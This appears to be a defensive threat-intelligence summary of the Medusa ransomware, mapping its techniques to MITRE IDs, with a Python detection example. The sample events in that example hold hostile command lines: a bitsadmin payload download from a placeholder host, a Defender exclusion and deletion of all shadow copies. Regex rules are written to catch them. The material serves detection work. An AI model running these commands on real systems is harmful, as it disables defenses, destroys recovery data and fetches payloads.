Medusa is a Windows-focused Ransomware-as-a-Service (RaaS) active since June 2021, with heightened activity after the launch of its Dedicated Leak Site in 2023. Security teams are encouraged to validate their defenses against Medusa’s tactics using AttackIQ’s attack graph and related tools.
Key points
- Medusa RaaS targets Windows and has been active since June 2021.
- Gained notoriety in early 2023 with the introduction of a Dedicated Leak Site (Medusa Blog).
- Should not be confused with MedusaLocker, another RaaS family active since 2019.
- Propagation methods include exploiting unpatched vulnerabilities and hijacking legitimate accounts (often via Initial Access Brokers).
- Employs Living-off-the-Land techniques to blend in with legitimate traffic.
- AttackIQ released an attack graph to help validate security controls against Medusa’s TTPs.
- Medusa uses ASPX web shells and BITSAdmin jobs for payload deployment and employs various WMI commands for discovery and lateral movement; encrypts files with RSA 2048 + AES 256 after deleting Volume Shadow Copies.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Propagation via exploiting vulnerable public-facing services; “Medusa is predominantly propagated through the exploitation of vulnerable services, such as public-facing assets or applications with known unpatched vulnerabilities…”
- [T1197] BITS Jobs – “This scenario executes bitsadmin to create a BITS job and configure it to download a remote payload.”
- [T1105] Ingress Tool Transfer – “These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious content.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – “This scenario uses the Add-MpPreference cmdlet to add the %TEMP%\aiq-temp-exclusion directory path to the Windows Defender exclusion list.”
- [T1082] System Information Discovery – “This scenario executes the Win32_OperatingSystem WMI command to collect OS information.”
- [T1057] Process Discovery – “This scenario executes the Process WMI command to discover running processes.”
- [T1083] File and Directory Discovery – “This scenario uses the CIM_DataFile WMI Class to enumerate files on the Windows directory.”
- [T1087.001] Account Discovery: Local Account – “This scenario executes the useraccount WMI command to get a list of local accounts.”
- [T1087] Account Discovery – “This scenario executes the Win32_LogonSession WMI command to list logon sessions.”
- [T1016] System Network Configuration Discovery – “This scenario executes a set of WMI commands to obtain information about the system network configuration.”
- [T1018] Remote System Discovery – “This scenario performs a scan of the local network using Nmap to discover any remotely accessible system with ports 139, 445, or 3389 open.”
- [T1021.001] Remote Services: Remote Desktop Protocol – “This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP).”
- [T1490] Inhibit System Recovery – “This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.”
- [T1486] Data Encrypted for Impact – “This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms.”
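Several of the scenarios above (BITS payload download, Defender exclusion, shadow-copy deletion, WMI account enumeration) leave a distinctive process command line behind. The following is an added example, not code from AttackIQ or the article, showing how a defender might run simple command-line detection rules over process-creation events; the sample events, file paths, URL and rule patterns are all constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 shape).
# Not real telemetry; the URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job1 /download /priority high "
            r"http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -c Add-MpPreference -ExclusionPath "%TEMP%\aiq-temp-exclusion"'},
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": r"vssadmin.exe delete shadows /all /quiet"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": r"wmic useraccount get name,sid"},
    # Benign administrative use: listing shadow copies should not fire T1490.
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": r"vssadmin list shadows"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

# Detection rules keyed by the MITRE technique they cover. The regexes are
# illustrative and would need tuning against real environment noise.
RULES = [
    ("T1197", "BITS job used to fetch a remote payload",
     re.compile(r"bitsadmin(\.exe)?\b.*(/transfer|/addfile|/create)", re.I)),
    ("T1562.001", "Defender exclusion added via Add-MpPreference",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)),
    ("T1490", "Volume Shadow Copies deleted with vssadmin",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("T1087.001", "Local account enumeration via WMI",
     re.compile(r"wmic(\.exe)?\s+useraccount", re.I)),
]


def detect(events):
    """Return (technique_id, description, command_line) for every rule match."""
    hits = []
    for ev in events:
        for tid, desc, rx in RULES:
            if rx.search(ev["cmd"]):
                hits.append((tid, desc, ev["cmd"]))
    return hits


if __name__ == "__main__":
    for tid, desc, cmd in detect(SAMPLE_EVENTS):
        print(f"[{tid}] {desc}: {cmd}")
```

In a real deployment the same patterns would be expressed as SIEM or EDR rules over the process-creation event source, with the benign variants (such as `vssadmin list shadows`) used as negative test cases.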
Indicators of Compromise
- [IOC] None mentioned – No IPs, domains, hashes, or filenames are cited in the article.
Read more: https://www.attackiq.com/2024/09/19/emulating-medusa-ransomware/